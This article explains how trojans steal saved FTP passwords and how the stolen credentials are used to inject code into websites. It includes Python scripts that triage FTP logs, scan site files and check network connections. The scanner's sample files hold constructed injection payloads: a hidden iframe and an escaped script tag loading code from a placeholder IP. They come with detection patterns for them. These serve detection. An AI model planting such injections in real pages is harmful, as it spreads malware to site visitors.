How are FTP passwords stolen?

This part was moved from the "website hacked" page because, in this case, the hackers are not attacking your website: your PC is the target, and that is why your websites end up "hacked". This article explains how that is done (in most cases) and how to solve the problem.

Long story short, you may have a Trojan / virus / spyware residing on your PC and sending information to the attackers. Despite the newest and frequently updated anti-virus software, the latest Trojans/viruses can slip past resident protection, hide on the hard disk and disable the anti-virus scanner.

Now, say you have picked one up. The passwords saved in your FTP client are stolen and sent, together with the FTP URLs, to a web robot script on some website. That script logs in to your FTP account, downloads pages (usually the default page of each directory) and JavaScript files, inserts an iframe or a piece of JavaScript, and uploads the files back to your websites. From then on your websites spread viruses and Trojans. If this is what happened, different IPs (usually proxies) will appear in the FTP log on the server, often within minutes of each other for the same account.
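The server-side trace of that robot is visible in the FTP transfer log: the same account downloads a page and, a few minutes later, the same page is stored back, frequently from a different IP. The script below is an added example, not part of the original article, that reads a transfer log in xferlog format (the log written by wu-ftpd, ProFTPD and vsftpd) and reports, per account, the client IPs seen and every download-then-re-upload of the same file. The log lines, the account names and the one-hour window are constructed for the example; the IP addresses come from the documentation ranges and belong to nobody.

```python
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample in xferlog format (not taken from a real server).
# Field 12 is the direction: o = file sent to the client (download),
# i = file received from the client (upload).
SAMPLE_XFERLOG = """\
Mon Jan  4 10:01:12 2010 1 203.0.113.5 4311 /www/index.html b _ o r siteowner ftp 0 * c
Mon Jan  4 10:01:15 2010 1 203.0.113.5 2201 /www/js/menu.js b _ o r siteowner ftp 0 * c
Mon Jan  4 10:03:40 2010 1 198.51.100.77 4890 /www/index.html b _ i r siteowner ftp 0 * c
Mon Jan  4 10:03:44 2010 1 198.51.100.77 2790 /www/js/menu.js b _ i r siteowner ftp 0 * c
Tue Jan  5 09:15:00 2010 2 192.0.2.10 51200 /www/photos/cat.jpg b _ i r siteowner ftp 0 * c
Tue Jan  5 11:00:00 2010 1 192.0.2.10 3000 /blog/post.html b _ i r blogger ftp 0 * c
"""

# Assumption: a legitimate edit cycle (download, edit, upload) rarely completes this
# quickly from a different address; tune it to your own workflow.
REUPLOAD_WINDOW = timedelta(hours=1)


def parse_xferlog_line(line):
    """Return (time, remote_ip, path, direction, user) or None if the line does not parse.
    Paths containing spaces are not handled (assumption: web-root files have none)."""
    t = line.split()
    if len(t) < 18:
        return None
    try:
        when = datetime.strptime(" ".join(t[:5]), "%a %b %d %H:%M:%S %Y")
    except ValueError:
        return None
    return when, t[6], t[8], t[11], t[13]


def triage_xferlog(log_text, window=REUPLOAD_WINDOW):
    """Per FTP account: the set of client IPs seen, and every file that was downloaded
    and then stored back within `window`, noting whether the upload came from another IP."""
    per_user = defaultdict(lambda: {"distinct_ips": set(), "reuploaded": []})
    last_download = {}  # (user, path) -> (time, ip) of the most recent download
    for line in log_text.splitlines():
        rec = parse_xferlog_line(line)
        if rec is None:
            continue
        when, ip, path, direction, user = rec
        per_user[user]["distinct_ips"].add(ip)
        key = (user, path)
        if direction == "o":
            last_download[key] = (when, ip)
        elif direction == "i" and key in last_download:
            dl_time, dl_ip = last_download[key]
            if timedelta(0) <= when - dl_time <= window:
                per_user[user]["reuploaded"].append({
                    "path": path,
                    "download_ip": dl_ip,
                    "upload_ip": ip,
                    "seconds_between": int((when - dl_time).total_seconds()),
                    "ip_changed": ip != dl_ip,
                })
    return dict(per_user)


def suspicious_accounts(findings, max_ips=2):
    """Accounts that deserve a password reset and a file review: any download-then-re-upload,
    or logins from more than `max_ips` distinct addresses."""
    return sorted(u for u, f in findings.items()
                  if f["reuploaded"] or len(f["distinct_ips"]) > max_ips)


if __name__ == "__main__":
    findings = triage_xferlog(SAMPLE_XFERLOG)
    for user in suspicious_accounts(findings):
        print(user, "IPs:", sorted(findings[user]["distinct_ips"]))
        for r in findings[user]["reuploaded"]:
            print("   ", r["path"], "re-uploaded after", r["seconds_between"], "s from",
                  r["upload_ip"], "(downloaded from", r["download_ip"] + ")")
```

Run it against the real transfer log on the server (ask your host where it is kept if you cannot see it) and treat every account it lists as compromised: the password must be changed from a clean machine, and every file in the re-upload list must be reviewed, not just the ones you remember editing.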

At the same time, the Trojan (virus, spyware) on your PC can perform other tasks: using your PC as a mail relay to send spam, recording everything you type, collecting sensitive information such as credit card numbers, spamming forums and blogs, and so on.

If this has happened to you (FTP passwords stolen, more than one website hacked at once), do not change the FTP passwords from the same PC; use another one, or your trusted notebook. If you use the same PC to change the FTP passwords and to clean the malicious code from your pages, your websites will be hacked again within 24 hours, because the Trojan simply steals the new passwords too.

Do not use that PC until it is cleaned.
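Cleaning the pages means finding every file the robot touched, and the injected code is easy to overlook in a large site. The script below is an added example, not code from the original article, that scans HTML and JavaScript files for the two kinds of injection described above: an iframe that is hidden (zero size, hidden style, or pushed off-screen) and script that builds its real code at runtime from escaped or numeric strings. The sample files, their names and the patterns flagged are constructed for the example; the hostnames in them are from a documentation IP range. The patterns are heuristics, so review each hit rather than deleting blindly.

```python
import re

# Constructed sample site files (not from a real compromised server). index.html and
# js/menu.js carry the two injection patterns described in the text; about.html is clean.
SAMPLE_FILES = {
    "index.html": (
        '<html><body><h1>Welcome</h1>\n'
        '<iframe src="http://198.51.100.23/in.cgi?3" width="0" height="0" '
        'style="visibility:hidden"></iframe>\n'
        '<script>document.write(unescape("%3Cscript%20src%3D%22http%3A%2F%2F198.51.100.23'
        '%2Fjs.js%22%3E%3C%2Fscript%3E"));</script>\n'
        '</body></html>\n'
    ),
    "js/menu.js": (
        'function showMenu(id) { document.getElementById(id).style.display = "block"; }\n'
        'eval(String.fromCharCode(118,97,114,32,97,61,49));\n'
    ),
    "about.html": (
        '<html><body><p>About us</p>\n'
        '<iframe src="/map.html" width="400" height="300"></iframe>\n'
        '<script>var year = 2010;</script>\n'
        '</body></html>\n'
    ),
}

IFRAME_TAG = re.compile(r"<iframe\b[^>]*>", re.I)
SCRIPT_BLOCK = re.compile(r"<script\b[^>]*>(.*?)</script>", re.I | re.S)
SRC_ATTR = re.compile(r"""src\s*=\s*["']?([^"'\s>]+)""", re.I)

# An iframe nobody is meant to see: zero width or height, hidden, or placed far off-screen.
HIDDEN_IFRAME = re.compile(
    r"""(?:width|height)\s*=\s*["']?0\b|visibility\s*:\s*hidden|display\s*:\s*none|"""
    r"""(?:left|top)\s*:\s*-\d{3,}""", re.I)

# Script that assembles code at runtime. Legitimate packers do this too (heuristic).
OBFUSCATED_SCRIPT = [
    ("document.write(unescape(...))", re.compile(r"document\.write\s*\(\s*unescape\s*\(", re.I)),
    ("eval(String.fromCharCode(...))", re.compile(r"eval\s*\(\s*String\.fromCharCode\s*\(", re.I)),
    ("long %XX escape run", re.compile(r"(?:%[0-9a-f]{2}){20,}", re.I)),
]


def scan_script_body(body):
    """Return a list of findings for one piece of JavaScript."""
    return [{"kind": "obfuscated script", "detail": label}
            for label, pattern in OBFUSCATED_SCRIPT if pattern.search(body)]


def scan_content(name, content):
    """Scan one file. A .js file is one script body; anything else is treated as HTML."""
    if name.lower().endswith(".js"):
        return scan_script_body(content)
    findings = []
    for m in IFRAME_TAG.finditer(content):
        tag = m.group(0)
        if HIDDEN_IFRAME.search(tag):
            src = SRC_ATTR.search(tag)
            findings.append({"kind": "hidden iframe",
                             "detail": src.group(1) if src else tag})
    for m in SCRIPT_BLOCK.finditer(content):
        findings.extend(scan_script_body(m.group(1)))
    return findings


def scan_site(files):
    """Map each file name to its findings, keeping only files with at least one hit."""
    report = {}
    for name, content in files.items():
        hits = scan_content(name, content)
        if hits:
            report[name] = hits
    return report


if __name__ == "__main__":
    for name, hits in scan_site(SAMPLE_FILES).items():
        for h in hits:
            print(f"{name}: {h['kind']}: {h['detail']}")
```

To use it on a real site, download the whole web root with a clean machine, build the `files` mapping by walking that directory, and compare the list of flagged files with the files the FTP log shows as re-uploaded; the two lists should agree, and anything in only one of them deserves a manual look.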

How to find Trojans on your PC

As mentioned above, some of them hide themselves and block anti-virus software. If the PC's OS freezes, or you get errors (some DLL), that can be a sign that a Trojan is trying to block the resident virus protection. Do not use System Restore to roll back to a previous version; instead, restart in Safe Mode and start an anti-virus scan. Or simply disconnect the hard disk and scan it from another PC, where the Trojan is not running and cannot interfere.

The old-fashioned way (WinXP): press Ctrl-Alt-Del and click the Processes tab. If there is a process with a suspicious name, kill it and wait a little. If it comes back, that could be your guy; do not kill it again for now. Search the disk for that file name, note the file's date (and its original name, so you can undo the change), and rename the file to something else. Now kill the process. If a new process appears under a different name, look for all files with the same date noted above, rename the suspicious ones (.exe, .dll), kill the new process and wait. If no new process appears, scan the whole PC (all files) with anti-virus software. Total Commander has these features (search by file name and date).

Since there are normally several instances of svchost.exe running, some Trojans load under that name. It is hard to tell which svchost.exe is fake, but with Process Explorer (free) you can check the path each instance was loaded from. If it is not loaded from the System32 folder, it is fake; a second check in Process Explorer is the parent process, since every genuine svchost.exe is started by services.exe. A fake svchost.exe is one of the Trojans responsible for stealing FTP passwords and other information.

If you find a fake svchost.exe (usually loaded from a Temp folder), check for a keylogger too. KL-Detector (free) is useful for finding files that change while you are typing. The file where your keystrokes are saved is usually in the System32 folder with a *.sys extension, so check for the newest (modified) files in that folder as well. Even after the PC has been cleaned of Trojans and viruses, run KL-Detector from time to time, just to be sure.

Another useful freeware tool is NetWorks, and not only as a network bandwidth monitor: it can show you all network connections (like netstat). The same list is available without extra software from the command line with netstat -ano, which also shows the PID of the process owning each connection. If there are too many connections, your PC may be communicating without your knowledge. Time for action.
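Reading a long connection list by eye is error-prone, so the script below is an added example, not code from the original article, that parses the output of netstat -ano and groups it by PID, flagging two patterns the article describes: one process talking to many different remote hosts, and one process opening connections to several SMTP servers (port 25), which is what the PC looks like when it is being used as a spam relay. The sample output, the thresholds and the IP addresses are constructed for the example.

```python
from collections import defaultdict

# Constructed `netstat -ano` output in the Windows XP layout (not a real capture).
# The last column is the PID, which ties each connection to a process.
SAMPLE_NETSTAT = """\
Active Connections

  Proto  Local Address          Foreign Address        State           PID
  TCP    0.0.0.0:135            0.0.0.0:0              LISTENING       900
  TCP    192.168.1.5:1045       203.0.113.80:80        ESTABLISHED     1320
  TCP    192.168.1.5:1046       198.51.100.9:25        SYN_SENT        1744
  TCP    192.168.1.5:1047       198.51.100.10:25       SYN_SENT        1744
  TCP    192.168.1.5:1048       198.51.100.11:25       ESTABLISHED     1744
  TCP    192.168.1.5:1049       192.0.2.44:8080        ESTABLISHED     1744
  UDP    0.0.0.0:445            *:*                                    4
"""

# Assumed thresholds, tune them for your PC: a process talking to 3+ different hosts at
# once, or to 2+ SMTP servers, is unusual unless it is a browser or a mail client.
MANY_HOSTS = 3
SMTP_FANOUT = 2


def parse_netstat(text):
    """Yield (proto, remote_host, remote_port, state, pid) for every row with a real
    remote endpoint; listening sockets and wildcard UDP rows are skipped."""
    for line in text.splitlines():
        t = line.split()
        if not t or t[0] not in ("TCP", "UDP"):
            continue
        # UDP rows have no State column, so the PID is always taken from the end.
        proto, remote, pid = t[0], t[2], t[-1]
        state = t[3] if proto == "TCP" and len(t) >= 5 else ""
        host, _, port = remote.rpartition(":")
        if state == "LISTENING" or host in ("0.0.0.0", "*", "[::]") or not port.isdigit():
            continue
        yield proto, host, int(port), state, pid


def summarize_netstat(text, many_hosts=MANY_HOSTS, smtp_fanout=SMTP_FANOUT):
    """Per PID: number of distinct remote hosts, the remote ports used, and flags for
    the two patterns described in the text (too many connections; outbound spam)."""
    per_pid = defaultdict(lambda: {"hosts": set(), "ports": set(), "smtp_hosts": set()})
    for proto, host, port, state, pid in parse_netstat(text):
        s = per_pid[pid]
        s["hosts"].add(host)
        s["ports"].add(port)
        if proto == "TCP" and port == 25:
            s["smtp_hosts"].add(host)
    summary = {}
    for pid, s in per_pid.items():
        flags = []
        if len(s["hosts"]) >= many_hosts:
            flags.append("many remote hosts")
        if len(s["smtp_hosts"]) >= smtp_fanout:
            flags.append("smtp fan-out")
        summary[pid] = {"distinct_hosts": len(s["hosts"]),
                        "ports": sorted(s["ports"]), "flags": flags}
    return summary


if __name__ == "__main__":
    for pid, s in summarize_netstat(SAMPLE_NETSTAT).items():
        print(pid, s["distinct_hosts"], "hosts, ports", s["ports"],
              "flags:", ", ".join(s["flags"]) or "none")
```

On the suspect PC, save the live list with netstat -ano > conn.txt and feed that file to summarize_netstat. For each flagged PID, look up the image path with Process Explorer or tasklist /FI "PID eq 1744" (substitute the flagged PID); a path under a Temp folder, or an svchost.exe outside System32, is the Trojan the previous paragraphs describe.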

Tools you can use to spot and remove viruses / Trojans of this kind: Malwarebytes' Anti-Malware, KL-Detector (keyloggers), the latest McAfee Stinger, the latest Avast! virus remover (fast scanners), Windows Worms Doors Cleaner (wwdc.exe, port blocker), GMER (rootkits/malware), and Ethereal or its successor Wireshark, or any other packet sniffer, to see what the PC is actually sending.

Signs of infection and prevention

Every time Java starts (the Java icon appears in the system tray), whatever kind of website you are on, be suspicious. Switch the Java console on to check what is being executed. Record the list of active processes so you can spot any strange process later. Check the root of the hard disk (C:\) for suspicious files (autorun.inf and other *.inf files). Keep anti-virus and anti-spyware software updated. Keep Java and browsers updated. Do not save FTP passwords in the FTP software; use a password manager instead. If your host offers SFTP or FTPS, use it rather than plain FTP, which sends the password in clear text.

Monitor network communication (the lamps/LEDs on an external modem, or a bandwidth monitor). Do not leave the PC connected to the network when it is not in use. Freezing, or any file error in Windows, can be a sign of infection.

